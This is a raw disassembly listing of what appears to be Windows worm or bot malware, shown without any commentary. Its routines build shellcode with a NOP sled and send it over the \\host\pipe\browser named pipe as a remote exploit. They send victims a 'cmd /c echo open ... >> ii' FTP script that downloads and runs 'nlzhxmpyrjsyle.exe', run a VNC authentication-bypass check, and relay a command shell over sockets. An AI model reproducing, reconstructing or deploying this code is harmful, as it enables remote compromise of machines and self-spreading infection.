var_60DC = byte ptr -60DCh
var_40DC = byte ptr -40DCh
Dest = byte ptr -20DCh
Dst = byte ptr -0DCh
var_C8 = dword ptr -0C8h
var_BC = byte ptr -0BCh
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_B6 = byte ptr -0B6h
var_B5 = byte ptr -0B5h
var_B4 = dword ptr -0B4h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = dword ptr -0ACh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = word ptr -9Ch
var_9A = byte ptr -9Ah
var_98 = byte ptr -98h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_74 = dword ptr -74h
Src = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = word ptr -60h
var_5C = byte ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
Size = dword ptr 8
Memory = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 60DCh
call __alloca_probe
push ebx
push esi
push edi
push offset a__6 ; "."
push [ebp+Size] ; Str1
call __strcmpi
pop ecx
xor ebx, ebx
test eax, eax
pop ecx
jz short loc_40E43D
push [ebp+Size]
mov esi, 2000h
lea eax, [ebp+Dest]
push offset aSIpc ; "\\\\%s\\ipc$"
push esi ; Count
push eax ; Dest
call __snprintf
push 20h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 1Ch
lea eax, [ebp+Dest]
mov [ebp+var_C8], eax
lea eax, [ebp+Dst]
push ebx
push offset dword_4E5E3C
push offset dword_4E5E40
push eax
call sub_43AB96
jmp short loc_40E442
; ---------------------------------------------------------------------------
loc_40E43D: ; CODE XREF: sub_40E3C7+23�j
mov esi, 2000h
loc_40E442: ; CODE XREF: sub_40E3C7+74�j
push [ebp+Size]
lea eax, [ebp+var_40DC]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call ds:dword_4F53C0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_40E486
loc_40E47F: ; CODE XREF: sub_40E3C7+197�j
; sub_40E3C7+36D�j ...
xor al, al
jmp loc_40E8CA
; ---------------------------------------------------------------------------
loc_40E486: ; CODE XREF: sub_40E3C7+B6�j
push 48h ; Size
lea eax, [ebp+var_B8]
push ebx ; Val
push eax ; Dst
call _memset
push 10h
mov [ebp+var_B8], 5
pop eax
mov [ebp+var_B7], bl
push 1
mov [ebp+var_B4], eax
pop edi
mov [ebp+var_B6], 0Bh
push eax ; Size
lea eax, [ebp+var_98]
push offset dword_449154 ; Src
push eax ; Dst
mov [ebp+var_B5], 3
mov [ebp+var_B0], 48h
mov [ebp+var_AE], bx
mov [ebp+var_AC], ebx
mov [ebp+var_A8], 10B8h
mov [ebp+var_A6], 10B8h
mov [ebp+var_A4], ebx
mov [ebp+var_A0], edi
mov [ebp+var_9C], bx
mov [ebp+var_9A], 1
call _memcpy
push 10h ; Size
lea eax, [ebp+var_84]
push offset dword_449168 ; Src
push eax ; Dst
mov [ebp+var_88], 3
call _memcpy
add esp, 24h
lea eax, [ebp+var_BC]
mov [ebp+var_74], 2
push ebx
push eax
lea eax, [ebp+var_B8]
push 48h
push eax
push [ebp+var_4]
call ds:dword_4F53B4 ; WriteFile
test eax, eax
jnz short loc_40E563
loc_40E555: ; CODE XREF: sub_40E3C7+268�j
push [ebp+var_4]
call ds:dword_4F533C ; CloseHandle
jmp loc_40E47F
; ---------------------------------------------------------------------------
loc_40E563: ; CODE XREF: sub_40E3C7+18C�j
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_60DC]
push esi
push eax
push [ebp+var_4]
call ds:dword_4F53BC ; ReadFile
push ebx ; Time
call _time
push eax ; Seed
call _srand
push 14h ; Size
lea eax, [ebp+Src]
push 41h ; Val
push eax ; Dst
call _memset
push 1Ch ; Size
lea eax, [ebp+var_30]
push 41h ; Val
push eax ; Dst
call _memset
add esp, 20h
call _rand
mov esi, [ebp+Memory]
mov [ebp+Src], eax
mov [ebp+var_64], edi
mov [ebp+var_68], ebx
lea esi, [esi+esi*4]
mov [ebp+var_6C], edi
shl esi, 2
mov [ebp+var_60], bx
cmp byte_4490E0[esi], bl
jz short loc_40E5DA
push 4
mov [ebp+var_24], edi
mov [ebp+var_28], ebx
mov [ebp+var_2C], edi
push offset dword_4E5E44
jmp short loc_40E5ED
; ---------------------------------------------------------------------------
loc_40E5DA: ; CODE XREF: sub_40E3C7+1FF�j
push 2
mov [ebp+var_28], ebx
pop eax
push 4 ; Size
mov [ebp+var_24], eax
mov [ebp+var_2C], eax
push offset dword_44917C ; Src
loc_40E5ED: ; CODE XREF: sub_40E3C7+211�j
lea eax, [ebp+var_20]
push eax ; Dst
call _memcpy
add esp, 0Ch
call _rand
mov edi, 0FAh
cdq
mov ecx, edi
idiv ecx
inc edx
mov [ebp+var_30], edx
call _rand
cdq
idiv edi
mov eax, dword_4490D4[esi]
mov [ebp+var_18], ebx
push eax ; Size
mov [ebp+Size], eax
inc edx
mov [ebp+var_1C], edx
call _malloc
mov edi, eax
pop ecx
cmp edi, ebx
jz loc_40E555
mov eax, [ebp+Size]
add eax, 0FFFFFFFEh
push eax ; Size
push 90h ; Val
push edi ; Dst
call _memset
mov eax, [ebp+Size]
push 2 ; Size
push ebx ; Val
lea eax, [edi+eax-2]
push eax ; Dst
call _memset
mov eax, dword_4490DC[esi]
push 7 ; Size
add eax, edi
push offset dword_4490C8 ; Src
push eax ; Dst
mov [ebp+Memory], eax
call _memcpy
mov eax, [ebp+Memory]
push 15Ch ; Size
add eax, 7
push offset dword_448F68 ; Src
push eax ; Dst
call _memcpy
mov eax, dword_4490D8[esi]
add esp, 30h
cmp byte_4490E0[esi], bl
mov [ebp+Memory], eax
jz short loc_40E6E6
push 4 ; Size
add eax, edi
push offset dword_4E5E34 ; Src
push eax ; Dst
call _memcpy
add [ebp+Memory], 0Ch
mov esi, offset dword_4490F8
mov eax, [ebp+Memory]
push 4 ; Size
add eax, edi
push esi ; Src
push eax ; Dst
call _memcpy
mov eax, [ebp+Memory]
push 4 ; Size
push esi ; Src
lea eax, [eax+edi+24h]
push eax ; Dst
mov [ebp+Memory], eax
call _memcpy
mov eax, [ebp+Memory]
push 4 ; Size
add eax, 0Ch
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 30h
jmp short loc_40E70E
; ---------------------------------------------------------------------------
loc_40E6E6: ; CODE XREF: sub_40E3C7+2D0�j
add eax, edi
mov [ebp+var_8], 10h
mov [ebp+Memory], eax
mov esi, offset dword_4490F8
loc_40E6F7: ; CODE XREF: sub_40E3C7+345�j
push 4 ; Size
push esi ; Src
push [ebp+Memory] ; Dst
call _memcpy
add [ebp+Memory], 4
add esp, 0Ch
dec [ebp+var_8]
jnz short loc_40E6F7
loc_40E70E: ; CODE XREF: sub_40E3C7+31D�j
mov eax, [ebp+Size]
add eax, 42h
push eax ; Size
call _malloc
mov esi, eax
pop ecx
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_40E739
push [ebp+var_4]
call ds:dword_4F533C ; CloseHandle
push edi ; Memory
call _free
pop ecx
jmp loc_40E47F
; ---------------------------------------------------------------------------
loc_40E739: ; CODE XREF: sub_40E3C7+35B�j
mov eax, [ebp+Size]
add eax, 42h
push eax ; Size
push ebx ; double
push esi ; Dst
call _memset
lea eax, [ebp+Src]
push 14h ; Size
push eax ; Src
push esi ; Dst
call _memcpy
mov eax, [ebp+Size]
mov dword ptr [ebp+var_10+4], ebx
mov dword ptr [ebp+var_10], eax
add esp, 10h
fild [ebp+var_10]
fmul ds:flt_43C488
fstp [esp+60F0h+var_60F0]
call _ceil
call __ftol
push [ebp+Size] ; Size
mov [esi+1Ch], eax
mov [esi+18h], ebx
mov eax, [esi+1Ch]
mov [esi+14h], eax
lea eax, [esi+20h]
push edi ; Src
push eax ; Dst
call _memcpy
mov eax, [ebp+Size]
add esp, 14h
add eax, 20h
test al, 3
mov [ebp+Memory], eax
jz short loc_40E7A6
loc_40E79E: ; CODE XREF: sub_40E3C7+3DA�j
inc eax
test al, 3
jnz short loc_40E79E
mov [ebp+Memory], eax
loc_40E7A6: ; CODE XREF: sub_40E3C7+3D5�j
lea ecx, [ebp+var_30]
push 1Ch ; Size
add eax, esi
push ecx ; Src
push eax ; Dst
call _memcpy
add [ebp+Memory], 1Ch
push edi ; Memory
call _free
push 18h ; Size
lea eax, [ebp+var_48]
push ebx ; Val
push eax ; Dst
call _memset
push 14h ; Size
lea eax, [ebp+var_5C]
push ebx ; Val
push eax ; Dst
mov [ebp+var_48], 5
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], 3
mov [ebp+var_44], 10h
mov [ebp+var_3E], bx
mov [ebp+var_3C], ebx
mov [ebp+var_34], bx
mov [ebp+var_32], 1Fh
call _memset
add esp, 28h
push ebx
push ebx
push 1
push ebx
call ds:dword_4F53B8 ; CreateEventA
mov [ebp+var_4C], eax
mov byte ptr [ebp+Size+3], bl
mov dword ptr [ebp+var_10+4], ebx
loc_40E813: ; CODE XREF: sub_40E3C7+4D6�j
cmp dword ptr [ebp+var_10+4], 2
jge loc_40E8A8
push 1 ; char
push 10B8h ; int
push [ebp+Memory] ; Memory
inc dword ptr [ebp+var_10+4]
push esi ; Src
lea esi, [ebp+var_48]
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+var_4] ; int
rep movsd
call sub_40E2D9
add esp, 2Ch
test al, al
jz short loc_40E8A5
cmp [ebp+var_4C], ebx
jz short loc_40E897
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_60DC]
push 2000h
push eax
push [ebp+var_4]
call ds:dword_4F53BC ; ReadFile
test eax, eax
jnz short loc_40E87E
call ds:dword_4F5360 ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz loc_40E47F
loc_40E87E: ; CODE XREF: sub_40E3C7+4A4�j
push 3E8h
push [ebp+var_4C]
call ds:dword_4F5374 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40E897
mov byte ptr [ebp+Size+3], 1
loc_40E897: ; CODE XREF: sub_40E3C7+483�j
; sub_40E3C7+4CA�j
cmp byte ptr [ebp+Size+3], bl
mov esi, [ebp+var_8]
jz loc_40E813
jmp short loc_40E8A8
; ---------------------------------------------------------------------------
loc_40E8A5: ; CODE XREF: sub_40E3C7+47E�j
mov esi, [ebp+var_8]
loc_40E8A8: ; CODE XREF: sub_40E3C7+450�j
; sub_40E3C7+4DC�j
push [ebp+var_4]
mov edi, ds:dword_4F533C
call edi ; CloseHandle
push esi ; Memory
call _free
cmp [ebp+var_4C], ebx
pop ecx
jz short loc_40E8C4
push [ebp+var_4C]
call edi ; CloseHandle
loc_40E8C4: ; CODE XREF: sub_40E3C7+4F6�j
cmp byte ptr [ebp+Size+3], bl
setnz al
loc_40E8CA: ; CODE XREF: sub_40E3C7+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E3C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E8CF proc near ; CODE XREF: sub_40E9BD+29�p
var_5A0 = byte ptr -5A0h
Str = byte ptr -1A0h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+Dst], 2
push eax
call ds:dword_4F5528 ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_4F552C ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_4F553C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40E99D
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call ds:dword_4F5530 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40E99D
mov edi, 400h
push esi
mov esi, ds:dword_4F5534
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset Str ; "nlzhxmpyrjsyle.exe"
push eax
push eax
push dword_4E2E18
push [ebp+arg_0]
call sub_40AF71
pop ecx
push eax
push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+Str]
push 190h ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Str]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push ebx
call ds:dword_4F5540 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E9A1
loc_40E99D: ; CODE XREF: sub_40E8CF+50�j
; sub_40E8CF+62�j
xor eax, eax
jmp short loc_40E9B8
; ---------------------------------------------------------------------------
loc_40E9A1: ; CODE XREF: sub_40E8CF+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_4F5538 ; closesocket
push 1
pop eax
loc_40E9B8: ; CODE XREF: sub_40E8CF+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E8CF endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40E9BD(char,char Size)
sub_40E9BD proc near ; DATA XREF: .data:004482A4�o
; .data:004482E4�o
arg_0 = byte ptr 4
Size = byte ptr 8
push ebx
push esi
push edi
xor ebx, ebx
loc_40E9C2: ; CODE XREF: sub_40E9BD+4B�j
lea eax, [esp+0Ch+Size]
push ebx ; Memory
push eax ; Size
call sub_40E3C7
pop ecx
test al, al
pop ecx
jz short loc_40E9F5
push 65h
lea esi, [esp+10h+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E8CF
add esp, 0C0h
test eax, eax
jnz short loc_40EA0A
loc_40E9F5: ; CODE XREF: sub_40E9BD+14�j
test ebx, ebx
jnz short loc_40EA04
push 7D0h
call ds:dword_4F534C ; Sleep
loc_40EA04: ; CODE XREF: sub_40E9BD+3A�j
inc ebx
cmp ebx, 2
jb short loc_40E9C2
loc_40EA0A: ; CODE XREF: sub_40E9BD+36�j
push 1
pop eax
pop edi
pop esi
pop ebx
retn
sub_40E9BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EA11 proc near ; CODE XREF: sub_40EB28+91�p
var_5A0 = byte ptr -5A0h
Dest = byte ptr -1A0h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+Dst], 2
push eax
call ds:dword_4F5528 ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_4F552C ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_4F553C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40EADF
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call ds:dword_4F5530 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40EADF
mov edi, 400h
push esi
mov esi, ds:dword_4F5534
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset Str ; "nlzhxmpyrjsyle.exe"
push eax
push eax
push dword_4E2E18
push [ebp+arg_0]
call sub_40AF71
pop ecx
push eax
push offset aCmdCEchoOpen_1 ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+Dest]
push 190h ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push ebx
call ds:dword_4F5540 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40EAE3
loc_40EADF: ; CODE XREF: sub_40EA11+50�j
; sub_40EA11+62�j
xor eax, eax
jmp short loc_40EAFA
; ---------------------------------------------------------------------------
loc_40EAE3: ; CODE XREF: sub_40EA11+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_4F5538 ; closesocket
push 1
pop eax
loc_40EAFA: ; CODE XREF: sub_40EA11+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40EA11 endp
; ---------------------------------------------------------------------------
push dword ptr [esp+4]
call ds:dword_4F5528 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40EB27
push dword ptr [esp+4]
call ds:dword_4F5550 ; gethostbyname
test eax, eax
jnz short loc_40EB20
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40EB20: ; CODE XREF: .text:0040EB1A�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40EB27: ; CODE XREF: .text:0040EB0C�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB28 proc near ; CODE XREF: sub_40C951+1EA�p
; DATA XREF: .data:off_448224�o
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+arg_4]
push edi
push eax
mov [ebp+var_10], 2
call dword_4E3138 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_C], eax
call dword_4E30F8 ; htons
push 6
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_4F553C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40EB9A
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4F5530 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40EB7B
push esi
jmp short loc_40EB94
; ---------------------------------------------------------------------------
loc_40EB7B: ; CODE XREF: sub_40EB28+4E�j
push 0
push 1213h
push offset dword_4491F8
push esi
call ds:dword_4F5540 ; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_40EB9E
loc_40EB94: ; CODE XREF: sub_40EB28+51�j
call ds:dword_4F5538 ; closesocket
loc_40EB9A: ; CODE XREF: sub_40EB28+3C�j
xor eax, eax
jmp short loc_40EBE0
; ---------------------------------------------------------------------------
loc_40EB9E: ; CODE XREF: sub_40EB28+6A�j
call ds:dword_4F5538 ; closesocket
push 216Bh
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40EA11
add esp, 0C0h
test eax, eax
jz short loc_40EBDD
mov eax, [ebp+arg_A8]
shl eax, 6
inc dword_448228[eax]
lea eax, dword_448228[eax]
loc_40EBDD: ; CODE XREF: sub_40EB28+9E�j
push 1
pop eax
loc_40EBE0: ; CODE XREF: sub_40EB28+74�j
pop edi
pop esi
leave
retn
sub_40EB28 endp
; =============== S U B R O U T I N E =======================================
sub_40EBE4 proc near ; CODE XREF: sub_40EC5E+74�p
; sub_40EC5E+D6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
xor esi, esi
loc_40EBEC: ; CODE XREF: sub_40EBE4+2D�j
test edi, edi
jle short loc_40EC17
mov eax, [esp+8+arg_4]
push 0
add eax, esi
push edi
push eax
push [esp+14h+arg_0]
call dword_4E3110 ; recv
test eax, eax
jz short loc_40EC13
cmp eax, 0FFFFFFFFh
jz short loc_40EC13
sub edi, eax
add esi, eax
jmp short loc_40EBEC
; ---------------------------------------------------------------------------
loc_40EC13: ; CODE XREF: sub_40EBE4+22�j
; sub_40EBE4+27�j
xor eax, eax
jmp short loc_40EC1A
; ---------------------------------------------------------------------------
loc_40EC17: ; CODE XREF: sub_40EBE4+A�j
push 1
pop eax
loc_40EC1A: ; CODE XREF: sub_40EBE4+31�j
pop edi
pop esi
retn
sub_40EBE4 endp
; =============== S U B R O U T I N E =======================================
sub_40EC1D proc near ; CODE XREF: sub_40EC5E+C0�p
; sub_40EC5E+ED�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_40EC5A
xor esi, esi
test edi, edi
jle short loc_40EC54
loc_40EC2D: ; CODE XREF: sub_40EC1D+35�j
mov eax, edi
push 0
sub eax, esi
push eax
mov eax, [esp+10h+arg_4]
add eax, esi
push eax
push [esp+14h+arg_0]
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40EC5A
test eax, eax
jz short loc_40EC5A
add esi, eax
cmp esi, edi
jl short loc_40EC2D
loc_40EC54: ; CODE XREF: sub_40EC1D+E�j
push 1
pop eax
loc_40EC57: ; CODE XREF: sub_40EC1D+3F�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EC5A: ; CODE XREF: sub_40EC1D+8�j
; sub_40EC1D+2B�j ...
xor eax, eax
jmp short loc_40EC57
sub_40EC1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40EC5E(int,char,int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_40EC5E proc near ; DATA XREF: .data:00448264�o
Dest = byte ptr -24Ch
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = byte ptr -3Ch
Src = byte ptr -38h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
Str = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
push ebp
mov ebp, esp
sub esp, 24Ch
push ebx
mov ax, word_44A480
push esi
push edi
push 0
push 1
push 2
mov [ebp+var_2], ax
pop edi
push edi
call dword_4E3178 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40EC8C
push eax
jmp short loc_40ECC0
; ---------------------------------------------------------------------------
loc_40EC8C: ; CODE XREF: sub_40EC5E+29�j
lea eax, [ebp+arg_4]
push eax
call dword_4E3138 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_48], eax
mov [ebp+var_4C], di
call dword_4E30F8 ; htons
mov [ebp+var_4A], ax
lea eax, [ebp+var_4C]
push 10h
push eax
push esi
call dword_4E30A0 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40ECCB
push esi
loc_40ECC0: ; CODE XREF: sub_40EC5E+2C�j
call dword_4E3190 ; closesocket
jmp loc_40EEBC
; ---------------------------------------------------------------------------
loc_40ECCB: ; CODE XREF: sub_40EC5E+5F�j
lea eax, [ebp+Src]
push 0Ch
push eax
push esi
call sub_40EBE4
add esp, 0Ch
test eax, eax
jz loc_40EEB5
lea eax, [ebp+var_20]
and [ebp+var_2C], 0
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+Src]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax ; Src
call _sscanf
add esp, 10h
cmp eax, edi
jnz loc_40EEB5
cmp [ebp+var_28], 3
jz short loc_40ED17
cmp [ebp+var_20], 8
jnz loc_40EEB5
loc_40ED17: ; CODE XREF: sub_40EC5E+AD�j
lea eax, [ebp+Src]
push 0Ch
push eax
push esi
call sub_40EC1D
add esp, 0Ch
test eax, eax
jz loc_40EEB5
lea eax, [ebp+var_3C]
push edi
push eax
push esi
call sub_40EBE4
add esp, 0Ch
test eax, eax
jz loc_40EEB5
lea eax, [ebp+var_2]
push 1
push eax
push esi
call sub_40EC1D
add esp, 0Ch
test eax, eax
jz loc_40EEB5
lea eax, [ebp+var_24]
push 4
push eax
push esi
call sub_40EBE4
add esp, 0Ch
test eax, eax
jz loc_40EEB5
mov eax, [ebp+var_24]
mov ebx, 0FF0000h
mov ecx, eax
mov edx, eax
and ecx, ebx
mov edi, 0FF00h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, edi
or edx, eax
shr ecx, 8
shl edx, 8
or ecx, edx
mov [ebp+var_24], ecx
jnz loc_40EEB5
push 1
push offset dword_4E5E50
push esi
call sub_40EC1D
add esp, 0Ch
test eax, eax
jz loc_40EEB5
lea eax, [ebp+var_1C]
push 18h
push eax
push esi
call sub_40EBE4
add esp, 0Ch
test eax, eax
jz loc_40EEB5
xor eax, eax
mov ecx, [ebp+var_8]
mov al, byte ptr [ebp+var_1C+1]
mov edx, ecx
mov ah, byte ptr [ebp+var_1C]
mov [ebp+var_1C], ax
xor eax, eax
mov al, byte ptr [ebp+var_1A+1]
mov ah, byte ptr [ebp+var_1A]
mov [ebp+var_1A], ax
xor eax, eax
mov al, byte ptr [ebp+var_14+1]
mov ah, byte ptr [ebp+var_14]
mov [ebp+var_14], ax
xor eax, eax
mov al, byte ptr [ebp+var_12+1]
mov ah, byte ptr [ebp+var_12]
mov [ebp+var_12], ax
xor eax, eax
mov al, byte ptr [ebp+var_10+1]
mov ah, byte ptr [ebp+var_10]
mov [ebp+var_10], ax
mov eax, ecx
and eax, ebx
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, edi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp+var_8], eax
add eax, 2
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
push [ebp+var_8]
mov edi, eax
push edi
push esi
call sub_40EEC3
add esp, 10h
lea eax, [ebp+arg_4]
push eax
push edi
push [ebp+var_20]
lea eax, [ebp+Dest]
push [ebp+var_28]
push offset aVncD_DSSAuthby ; "VNC%d.%d %s: %s - [AuthBypass]"
push 200h ; Count
push eax ; Dest
call __snprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_B0] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+arg_0] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
mov eax, [ebp+arg_A8]
add esp, 34h
shl eax, 6
inc dword_448228[eax]
push esi
lea eax, dword_448228[eax]
call ds:dword_4F5538 ; closesocket
push 1
pop eax
jmp short loc_40EEBE
; ---------------------------------------------------------------------------
loc_40EEB5: ; CODE XREF: sub_40EC5E+7E�j
; sub_40EC5E+A3�j ...
push esi
call ds:dword_4F5538 ; closesocket
loc_40EEBC: ; CODE XREF: sub_40EC5E+68�j
xor eax, eax
loc_40EEBE: ; CODE XREF: sub_40EC5E+255�j
pop edi
pop esi
pop ebx
leave
retn
sub_40EC5E endp
; =============== S U B R O U T I N E =======================================
sub_40EEC3 proc near ; CODE XREF: sub_40EC5E+1E3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
push edi
mov edi, [esp+8+arg_4]
test esi, esi
jle short loc_40EEDF
push esi
push edi
push [esp+10h+arg_0]
call sub_40EBE4
add esp, 0Ch
loc_40EEDF: ; CODE XREF: sub_40EEC3+C�j
and byte ptr [edi+esi], 0
pop edi
pop esi
retn
sub_40EEC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EEE6 proc near ; DATA XREF: sub_40EF74+15B�o
var_404 = byte ptr -404h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40EEEF: ; CODE XREF: sub_40EEE6+25�j
; sub_40EEE6+41�j
push 0
lea eax, [ebp+var_404]
push 400h
push eax
push dword_4E5E64
call dword_4E3110 ; recv
test eax, eax
jle short loc_40EEEF
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
lea eax, [ebp+var_404]
push eax
push dword_4E5E60
call ds:dword_4F53B4 ; WriteFile
jmp short loc_40EEEF
sub_40EEE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EF29 proc near ; DATA XREF: sub_40EF74+142�o
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40EF32: ; CODE XREF: sub_40EF29+2F�j
; sub_40EF29+49�j
lea eax, [ebp+var_4]
and [ebp+var_4], 0
push 0
push eax
lea eax, [ebp+var_404]
push 400h
push eax
push dword_4E5E54
call ds:dword_4F53BC ; ReadFile
cmp [ebp+var_4], 0
jle short loc_40EF32
push 0
